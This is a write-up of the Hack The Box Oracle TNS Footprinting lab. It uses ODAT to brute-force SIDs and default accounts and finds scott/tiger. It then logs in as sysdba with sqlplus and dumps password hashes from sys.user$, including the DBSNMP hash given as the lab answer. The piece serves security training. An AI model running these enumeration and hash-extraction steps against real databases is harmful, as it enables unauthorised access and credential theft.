Posted inLabs and Lessons

Hack The Box: Complete walkthrough of the Oracle TNS Footprinting lab module.

Posted inLabs and Lessons

Solution to the HTB Oracle TNS Footprinting lesson

The Hack The Box (HTB) Oracle TNS Footprinting module teaches you how to analyze and potentially exploit the Oracle Transparent Network Substrate (TNS), the Oracle server communication protocol that facilitates communication between Oracle databases and applications over networks. Here’s how to derive the solution and capture the flag.

Your directions in this exercise are to enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer. Fire up the provided Pwnbox virtual machine and open a terminal.

Install Oracle tools

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Then test it with:

./odat.py -h

Scan with ODAT

Now we can scan the instance using the ODAT toolset. Note that the scan takes a long time to run, especially if your virtual machine is started using UDP (change it to TCP instead).

During the scan you will receive a vague (and confusing) prompt which will kill your scan. Here’s the *wrong* way to answer the prompt.

./odat.py all -s 10.129.205.19
[+] Checking if target 10.129.205.19:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.205.19:1521 is well configured. Continue...

[1] (10.129.205.19:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] (10.129.205.19:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the 10.129.205.19:1521 server
[+] 'XE' is a valid SID. Continue... ######################## | ETA: 00:00:00
100% |#########################################################| Time: 00:01:45
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid SID. Continue... ################## | ETA: 00:00:10
100% |#########################################################| Time: 00:01:32
[+] SIDs found on the 10.129.205.19:1521 server: XE

[3] (10.129.205.19:1521): Searching valid Service Names
[3.1] Searching valid Service Names thanks to a well known Service Name list on the 10.129.205.19:1521 server
[+] 'XE' is a valid Service Name. Continue... ##### | ETA: 00:00:00
[+] 'XEXDB' is a valid Service Name. Continue...
100% |#########################################################| Time: 00:01:46
[3.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:05
[3.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid Service Name. Continue... | ETA: 00:00:10
100% |#########################################################| Time: 00:01:31
[+] Service Name(s) found on the 10.129.205.19:1521 server: XE,XEXDB
[!] Notice: SID 'XE' found. Service Name 'XE' found too: Identical database instance. Removing Service Name 'XE' from Service Name list in order to don't do same checks twice

[4] (10.129.205.19:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do::36
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
s
100% |#########################################################| Time: 00:01:37
[-] No found a valid account on 10.129.205.19:1521/XE. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-files accounts/logins.txt accounts/pwds.txt'

[5] (10.129.205.19:1521): Searching valid accounts on the XEXDB Service Name
The login abm has already been tested at least once. What do you want to do::--
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
s
100% |#########################################################| Time: 00:00:03
[-] No found a valid account on 10.129.205.19:1521/XEXDB. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-files accounts/logins.txt accounts/pwds.txt'

Note that our scan did not return anything to help us derive the hash of the DBSNMP password. However, this is because, when prompted with “The login cis has already been tested at least once. What do you want to do::36”, we answered with “s”. We should have chosen to “continue without to ask” option.

Scan with ODAT but select “continue without to ask” when prompted

The scan below discovers the scott/tiger user login in the database.

./odat.py all -s 10.129.205.19
[+] Checking if target 10.129.205.19:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.205.19:1521 is well configured. Continue...

[1] (10.129.205.19:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] (10.129.205.19:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the 10.129.205.19:1521 server
[+] 'XE' is a valid SID. Continue...  ######################## | ETA:  00:00:00 
100% |#########################################################| Time: 00:01:43 
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03 
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid SID. Continue...  ##################       | ETA:  00:00:10 
100% |#########################################################| Time: 00:01:36 
[+] SIDs found on the 10.129.205.19:1521 server: XE

[3] (10.129.205.19:1521): Searching valid Service Names
[3.1] Searching valid Service Names thanks to a well known Service Name list on the 10.129.205.19:1521 server
[+] 'XE' is a valid Service Name. Continue...            ##### | ETA:  00:00:01 
[+] 'XEXDB' is a valid Service Name. Continue...         
100% |#########################################################| Time: 00:01:52 
[3.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03 
[3.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid Service Name. Continue...                  | ETA:  00:00:10 
100% |#########################################################| Time: 00:01:37 
[+] Service Name(s) found on the 10.129.205.19:1521 server: XE,XEXDB
[!] Notice: SID 'XE' found. Service Name 'XE' found too: Identical database instance. Removing Service Name 'XE' from Service Name list in order to don't do same checks twice

[4] (10.129.205.19:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do::28 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password4 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password6 
[!] Notice: 'dip' account is locked, so skipping this username for password5:59 
[!] Notice: 'hr' account is locked, so skipping this username for password04:43 
[!] Notice: 'mdsys' account is locked, so skipping this username for password32 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password26 
[+] Valid credentials found: scott/tiger. Continue...          | ETA:  00:01:19 
[!] Notice: 'xdb' account is locked, so skipping this username for password0:15 
100% |#########################################################| Time: 00:06:35 
[+] Accounts found on 10.129.205.19:1521/sid:XE: 
scott/tiger


[5] (10.129.205.19:1521): Searching valid accounts on the XEXDB Service Name
The login abm has already been tested at least once. What do you want to do::-- 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password8 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password4 
[!] Notice: 'dip' account is locked, so skipping this username for password5:21 
[!] Notice: 'hr' account is locked, so skipping this username for password04:19 
[!] Notice: 'mdsys' account is locked, so skipping this username for password19 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password20 
[+] Valid credentials found: scott/tiger. Continue...          | ETA:  00:01:17 
[!] Notice: 'xdb' account is locked, so skipping this username for password0:15 
100% |#########################################################| Time: 00:06:24 
[+] Accounts found on 10.129.205.19:1521/serviceName:XEXDB: 
scott/tiger


[6] (10.129.205.19:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[6.1] UTL_HTTP library ?
[-] KO
[6.2] HTTPURITYPE library ?
19:18:59 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[6.3] UTL_FILE library ?
[-] KO
[6.4] JAVA library ?
[-] KO
[6.5] DBMSADVISOR library ?
[-] KO
[6.6] DBMSSCHEDULER library ?
[-] KO
[6.7] CTXSYS library ?
[-] KO
[6.8] Hashed Oracle passwords ?
[-] KO
[6.9] Hashed Oracle passwords with a view in ORACLE_OCM?
19:19:00 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[6.10] Hashed Oracle passwords from history?
[-] KO
[6.11] DBMS_XSLPROCESSOR library ?
[-] KO
[6.12] External table to read files ?
[-] KO
[6.13] External table to execute system commands ?
[-] KO
[6.14] Oradbg ?
[-] KO
[6.15] DBMS_LOB to read files ?
[-] KO
[6.16] SMB authentication capture ?
[-] KO
[6.17] Gain elevated access (privilege escalation)?
[6.17.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[6.17.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[6.17.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[6.17.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[6.17.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[6.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[6.19] Create file on target (CVE-2018-3004)?
[-] KO
[6.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[7] (10.129.205.19:1521): Oracle users have not the password identical to the username ?
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password 
The login XS$NULL has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password
[!] Notice: 'HR' account is locked, so skipping this username for password00:47 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password37 
[!] Notice: 'XDB' account is locked, so skipping this username for password0:25 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password0 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password2 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password
[!] Notice: 'DIP' account is locked, so skipping this username for password0:07 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password05 
100% |#########################################################| Time: 00:00:36 
[-] No found a valid account on 10.129.205.19:1521/sid:XE with usernameLikePassword module

[8] (10.129.205.19:1521): Testing all authenticated modules on ServiceName:XEXDB with the scott/tiger account
[8.1] UTL_HTTP library ?
[-] KO
[8.2] HTTPURITYPE library ?
19:19:45 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[8.3] UTL_FILE library ?
[-] KO
[8.4] JAVA library ?
[-] KO
[8.5] DBMSADVISOR library ?
[-] KO
[8.6] DBMSSCHEDULER library ?
[-] KO
[8.7] CTXSYS library ?
[-] KO
[8.8] Hashed Oracle passwords ?
[-] KO
[8.9] Hashed Oracle passwords with a view in ORACLE_OCM?
19:19:47 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[8.10] Hashed Oracle passwords from history?
[-] KO
[8.11] DBMS_XSLPROCESSOR library ?
[-] KO
[8.12] External table to read files ?
[-] KO
[8.13] External table to execute system commands ?
[-] KO
[8.14] Oradbg ?
[-] KO
[8.15] DBMS_LOB to read files ?
[-] KO
[8.16] SMB authentication capture ?
[-] KO
[8.17] Gain elevated access (privilege escalation)?
[8.17.6] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[8.17.7] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[8.17.8] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[8.17.9] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[8.17.10] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[8.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[8.19] Create file on target (CVE-2018-3004)?
[-] KO
[8.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[9] (10.129.205.19:1521): Oracle users have not the password identical to the username ?
The login XS$NULL has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password
[!] Notice: 'HR' account is locked, so skipping this username for password00:19 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password16 
[!] Notice: 'XDB' account is locked, so skipping this username for password0:11 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password9 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password6 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password
[!] Notice: 'DIP' account is locked, so skipping this username for password0:03 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password02 
100% |#########################################################| Time: 00:00:27 
[-] No found a valid account on 10.129.205.19:1521/ServiceName:XEXDB with usernameLikePassword module

Query users from database using found scott/tiger login as sysdba

With the scott/tiger user login in hand, connect to the database (XE SID) as sysdba and query for all the users accounts in the database.

sqlplus scott/tiger@10.129.171.160/XE as sysdba

SQL*Plus: Release 21.0.0.0.0 - Production on Sat Jun 21 08:40:35 2025
Version 21.12.0.0.0

Copyright (c) 1982, 2022, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select name, password from sys.user$;

NAME			       PASSWORD
------------------------------ ------------------------------
SYS			       FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM			       B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN			       4A3BA55E08595C81
EXP_FULL_DATABASE

NAME			       PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
DBFS_ROLE
DIP			       CE4A36B8E06CA59C
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
ADM_PARALLEL_EXECUTE_TASK
GATHER_SYSTEM_STATISTICS
XDB_WEBSERVICES_OVER_HTTP

NAME			       PASSWORD
------------------------------ ------------------------------
ORACLE_OCM		       5A2E026A9157958C
RECOVERY_CATALOG_OWNER
SCHEDULER_ADMIN
HS_ADMIN_SELECT_ROLE
HS_ADMIN_EXECUTE_ROLE
HS_ADMIN_ROLE
OEM_ADVISOR
OEM_MONITOR
DBSNMP			       E066D214D5421CCC
APPQOSSYS		       519D632B7EE7F63A
PLUSTRACE

NAME			       PASSWORD
------------------------------ ------------------------------
CTXSYS			       D1D21CA56994CAB6
CTXAPP
XDB			       E76A6BD999EF9FF1
ANONYMOUS		       anonymous
XDBADMIN
XDB_SET_INVOKER
AUTHENTICATEDUSER
XDB_WEBSERVICES
XDB_WEBSERVICES_WITH_PUBLIC
XS$NULL 		       DC4FCC8CB69A6733
_NEXT_USER

NAME			       PASSWORD
------------------------------ ------------------------------
MDSYS			       72979A94BAD2AF80
HR			       4C6D73C3E8B0F0DA
FLOWS_FILES		       30128982EA6D4A3D
APEX_PUBLIC_USER	       4432BA224E12410A
APEX_ADMINISTRATOR_ROLE
APEX_040000		       E7CE9863D7EEB0A4
SCOTT			       F894844C34402B67

51 rows selected.

Hashed password for DBSNMP user (in our managed virtual machine) is: E066D214D5421CCC

Tags: